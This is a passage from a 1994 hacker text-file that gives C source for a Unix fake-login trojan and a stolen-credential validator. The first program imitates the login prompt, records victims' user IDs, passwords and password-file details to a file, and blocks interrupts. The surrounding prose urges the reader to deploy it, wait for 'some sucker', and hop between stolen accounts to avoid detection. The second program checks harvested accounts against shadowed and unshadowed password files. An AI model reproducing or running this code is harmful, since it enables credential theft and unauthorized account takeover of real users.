  996. /* If we have a valid account & password, get user info from the
  997.    pwfile & store it */
  998.  
  999.         if ( invalid == 0 ) {
  1000.  
  1001.            u.comment = pwentry->pw_gecos;
  1002.             u.homedir = pwentry->pw_dir;
  1003.            u.shell = pwentry->pw_shell;
  1004.  
  1005.           /* Open file to store user info */
  1006.  
  1007.            if ((fp = fopen(OUTFILE, "a")) == NULL)
  1008.               log_out();
  1009.  
  1010.                write_details(&u);
  1011.                 fclose(fp);
  1012.                 no_message = 1;
  1013.                flag = 1;
  1014.         }
  1015.         else
  1016.            flag = 0;
  1017.  
  1018.         invalid_login();
  1019.  
  1020.     endpwent();                       /* Close pwfile */
  1021.  
  1022.     if (no_message == 0)
  1023.        loop_cnt++;
  1024.  
  1025.   }                                  /* end while */
  1026.  
  1027. log_out();                           /* call real login program */
  1028.  
  1029. }
  1030.  
  1031. /* Function to read user i.d. & password */
  1032.  
  1033. void get_info( void )
  1034. {
  1035.    char user[11];
  1036.    unsigned int string_len;
  1037.  
  1038.    fflush(stdin);
  1039.     prep_str(u.logname);
  1040.     prep_str(u.key);
  1041.    strcpy(user, "\n");
  1042.  
  1043. /* Loop while some loser keeps hitting return when asked for user
  1044.    i.d. and if someone hits CTRL-D to break out of spoof. Enter
  1045.    a # at login to exit spoof. Uncomment the appropriate line(s)
  1046.    below to customise the spoof to look like your system */
  1047.  
  1048.   while ((strcmp(user, "\n") == NULL) && (!feof(stdin)))
  1049.   {
  1050.    /* printf("Scorch Ltd SUNOS 4.1.3\n\n); */
  1051.  
  1052.     if (loop_cnt > 0)
  1053.        strcpy(hname, "login: ");
  1054.  
  1055.       printf("%s", hname);
  1056.       fgets(user, 9, stdin);
  1057.  
  1058.    /* Back door for hacker, # at present, can be changed,
  1059.       but leave \n in. */
  1060.  
  1061.      if (strcmp(user, "#\n") == NULL)
  1062.          exit(0);
  1063.  
  1064.     /* Strip \n from login i.d. */
  1065.  
  1066.      if (strlen(user) < 8)
  1067.         string_len = strlen(user) - 1;
  1068.      else
  1069.         string_len = strlen(user);
  1070.  
  1071.      strncpy(u.logname, user, string_len);
  1072.  
  1073. /* check to see if CTRL-D has occurred because it does not
  1074.    generate an interrupt like CTRL-C, but instead generates
  1075.    an end-of-file on stdin */
  1076.  
  1077.      if (feof(stdin)) {
  1078.          clearerr(stdin);
  1079.         printf("\n");
  1080.      }
  1081.  
  1082.   }
  1083.  
  1084. /* Turn off screen display & read users password */
  1085.  
  1086.      strncpy(u.key, getpass("Password:"), 8);
  1087.  
  1088. }
  1089.  
  1090. /* Function to increment the timer which holds the amount of time
  1091.    the spoof has been running */
  1092.  
  1093. void catch( void )
  1094. {
  1095.   time_on++;
  1096.  
  1097. /* If spoof has been running for 15 minutes, and has not
  1098.    been used, stop timer and call spoof exit routine */
  1099.  
  1100. if ( time_out == 0 ) {
  1101.    if (time_on == 15) {
  1102.        printf("\n");
  1103.         alarm(0);
  1104.        log_out();
  1105.    }
  1106. }
  1107.  
  1108. /* 'Touch' your tty, effectively keeping terminal idle time to 0 */
  1109.  
  1110.  utime(tty, times);
  1111. alarm(50);
  1112. }
  1113.  
  1114. /* Initialise a string with \0's */
  1115.  
  1116. void prep_str( char str[] )
  1117. {
  1118. int strl, cnt;
  1119.  
  1120. strl = strlen(str);
  1121. for (cnt = 0; cnt != strl; cnt++)
  1122.     str[cnt] = ' ';
  1123. }
  1124.  
  1125. /* function to catch interrupts, CTRL-C & CTRL-Z etc as
  1126.    well as the timer signals */
  1127.  
  1128. void disable_interrupts( void )
  1129. {
  1130.    signal(SIGALRM, catch);
  1131.     signal(SIGQUIT, SIG_IGN);
  1132.      signal(SIGTERM, SIG_IGN);
  1133.     signal(SIGINT, SIG_IGN);
  1134.    signal(SIGTSTP, SIG_IGN);
  1135. }
  1136.  
  1137. /* Write the users i.d., password, personal information, homedir
  1138.    and shell to a file */
  1139.  
  1140. void write_details(struct loginfo *sptr)
  1141. {
  1142.  
  1143.    fprintf(fp, "%s:%s:", sptr->logname, sptr->key);
  1144.     fprintf(fp, "%d:%d:", pwentry->pw_uid, pwentry->pw_gid);
  1145.      fprintf(fp, "%s:%s:", sptr->comment, sptr->homedir);
  1146.     fprintf(fp, "%s\n", sptr->shell);
  1147.    fprintf(fp, "\n");
  1148. }
  1149.  
  1150. /* Display login incorrect only if the user hasn't logged on as
  1151.    'sync' */
  1152.  
  1153. void invalid_login( void )
  1154. {
  1155.  
  1156.          if ( flag == 1 && pwstat == 0 )
  1157.             sleep(wait);
  1158.  
  1159.          if ( no_message == 0 )
  1160.             printf("Login incorrect\n");
  1161. }
  1162.  
  1163. /* Displays appropriate message, exec's the real login program,
  1164.    this replaces the spoof & effectively logs spoof's account off.
  1165.    Note: this spoof must be exec'd from the shell to work */
  1166.  
  1167. void log_out( void )
  1168. {
  1169.   time_out = 1;
  1170.  
  1171.    if ( no_message == 1 ) {
  1172.         sleep(1);
  1173.        printf("Login incorrect\n");
  1174.    }
  1175.  
  1176.    execl(LOGPATH, "login", (char *)0);
  1177. }
  1178.  
  1179. ----------cut here-------------------------------------------------------
  1180.  
  1181. then delete the source, run it and wait for some sucker to login!.
  1182. If you do initially run this spoof from your account, I suggest you
  1183. remove it when you have grabbed someone's account and run it from theirs
  1184. from then on, this reduces your chances of being caught!
  1185.  
  1186.                       User i.d. & Password Validator
  1187.                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1188.  
  1189. Now if you are familiar with the unix Crack program, as I'm sure most of
  1190. you are ;-), or if you have used my spoof to grab some accounts,
  1191. this little program could be of some use. Say you have snagged
  1192. quit a few accounts, and a few weeks later you wanna see if they are still
  1193. alive, instead of logging onto them, then logging out again 20 or 30 times
  1194. which can take time, and could get the system admin looking your way, this
  1195. program will continuously ask you to enter a user i.d. & password, then
  1196. validate them both by actually using the appropriate entry in the password
  1197. file. All valid accounts are then stored along with other info from the
  1198. password file, in a data file. The program loops around until you stop it.
  1199.  
  1200. This works on all unshadowed unix systems, and, you guessed it!, shadowed
  1201. SUNOS systems.
  1202.  
  1203. If you run it on an unshadowed unix other than SUNOS, remove all references
  1204. to pwdauth(), along with the shadow password file checking routine,
  1205. if your on sysV, your shit outa luck! anyway, here goes :-
  1206.  
  1207. ---cut here---------------------------------------------------------------
  1208.  
  1209. /* Program   : To validate accounts & passwords on both
  1210.                shadowed & unshadowed unix systems.
  1211.    Author    : The Shining/UPi (UK Division)
  1212.    Date      : Released 12/4/94
  1213.    UNIX type : All unshadowed systems, and SUNOS shadowed systems */
  1214.  
  1215. #include
  1216. #include
  1217. #include
  1218.  
  1219. FILE *fp;
  1220.  
  1221. int pw_system( void ), shadowed( void ), unshadowed( void );
  1222. void write_info( void ), display_notice( void );
  1223.  
  1224. struct passwd *pwentry, *getpwnam();
  1225.  
  1226. struct user {
  1227.        char logname[10];
  1228.        char key[9];
  1229.        char salt[3];
  1230. } u;
  1231.  
  1232. char *getpass(), *pwdauth(), *crypt(), ans[2];
  1233. int invalid_user, stat;
  1234.  
  1235. int main( void )
  1236. {
  1237.  
  1238.  strcpy(ans, "y");
  1239.  
  1240.  while (strcmp(ans, "y") == NULL)
  1241.  {
  1242.    invalid_user = stat = 0;
  1243.     display_notice();
  1244.      printf("Enter login id:");
  1245.     scanf("%9s", u.logname);
  1246.    strcpy(u.key, getpass("Password:"));
  1247.  
  1248.  setpwent();
  1249.  
  1250.    if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL)
  1251.       invalid_user = 1;
  1252.    else
  1253.       strncpy(u.salt, pwentry->pw_passwd, 2);
  1254.  
  1255.  if (invalid_user != 1) {
  1256.  
  1257.    if ((stat = pw_system()) == 1) {
  1258.       if ((stat = unshadowed()) == NULL) {
  1259.            printf("Unshadowed valid account! - storing details\n");
  1260.           write_info();
  1261.       }
  1262.    }
  1263.    else
  1264.      if ((stat = shadowed()) == NULL) {
  1265.           printf("SUNOS Shadowed valid account! - storing details\n");
  1266.          write_info();
  1267.      }
  1268.      else
  1269.         invalid_user = 2;
  1270.  
  1271.  }
  1272.  
  1273.     if (invalid_user == 1)
  1274.        printf("User unknown/not found in password file\n");
  1275.  
  1276.     if (invalid_user == 2 )
  1277.        printf("Password invalid\n");
  1278.  
  1279.        printf("\n\nValidate another account?(y/n): ");
  1280.        scanf("%1s", ans);
  1281.  
  1282.  endpwent();
  1283.  }
  1284. }
  1285.  
  1286. /* Check to see if shadow password system is used, in SUNOS the field
  1287.    in /etc/passwd starts with a '#', if not, check to see if entry
  1288.    is 13 chars, if not shadow must be in use. */
  1289.  
  1290. int pw_system( void )
  1291. {
  1292.    if (strlen(pwentry->pw_passwd) != 13)
  1293.       return(0);
  1294.    else
  1295.       if (strcmp(u.salt, "##") == NULL)
  1296.          return(0);
  1297.       else
  1298.          return(1);
  1299. }
  1300.  
  1301. /* If system is unshadowed, get the 2 character salt from the password
  1302.    file, and use this to encrypt the password entered. This is then
  1303.    compared against the password file entry. */
  1304.  
  1305. int unshadowed( void )
  1306. {
  1307. if (pwentry->pw_passwd == crypt(u.key, u.salt))
  1308.    return(0);
  1309. else
  1310.    return(1);
  1311. }
  1312.  
  1313. /* If SUNOS shadowe system is used, use the pwdauth() function to validate
  1314.    the password stored in the /etc/security/passwd.adjunct file */
  1315.  
  1316. int shadowed( void )
  1317. {
  1318. int pwstat;
  1319.  
  1320. if (pwstat = pwdauth(u.logname, u.key) == NULL)
  1321.    return(0);
  1322. else
  1323.    return(1);
  1324. }
  1325.  
  1326. /* Praise myself!!!! */
  1327.  
  1328. void display_notice( void )
  1329. {
  1330. system("clear");
  1331.  printf("Unix Account login id & password validator.\n");
  1332.  printf("For all unshadowed UNIX systems & shadowed SUNOS only.\n\n");
  1333. printf("(c)1994 The Shining\n\n\n\n");
  1334. }
  1335.  
  1336. /* Open a file called 'data' and store account i.d. & password along with
  1337.    other information retrieved from the password file */
  1338.  
  1339. void write_info( void )
  1340. {
  1341.  
  1342. /* Open a file & store account information from pwfile in it */
  1343.  
  1344. if ((fp = fopen("data", "a")) == NULL) {
  1345.      printf("error opening output file\n");
  1346.     exit(0);
  1347. }
  1348.  
  1349. fprintf(fp, "%s:%s:%d:", u.logname, u.key, pwentry->pw_uid);
  1350.  fprintf(fp, "%d:%s:", pwentry->pw_gid, pwentry->pw_gecos);
  1351.  fprintf(fp, "%s:%s\n", pwentry->pw_dir, pwentry->pw_shell);
  1352. fclose(fp);
  1353. }
  1354.  
  1355. -----cut here------------------------------------------------------------------
  1356.  
  1357. The above programs will not compile under non-ansi C compilers without quite
  1358. a bit of modification. I have tested all these programs on SUNOS both
  1359. shadowed & unshadowed, though they should work on other systems with
  1360. little modification (except the shadow password cracker, which is SUNOS
  1361. shadow system specific).
  1362.  
  1363. Regards to the following guys :-
  1364.  
  1365. Archbishop & The Lost Avenger/UPi, RamRaider/QTX,
  1366. the guys at United International Perverts(yo Dirty Mac & Jasper!)
  1367. and all I know.
  1368.  
  1369. (c) 1994 The Shining (The NORTH!, U.K.)
  1370.  
  1371. *******************************************************************************
  1372.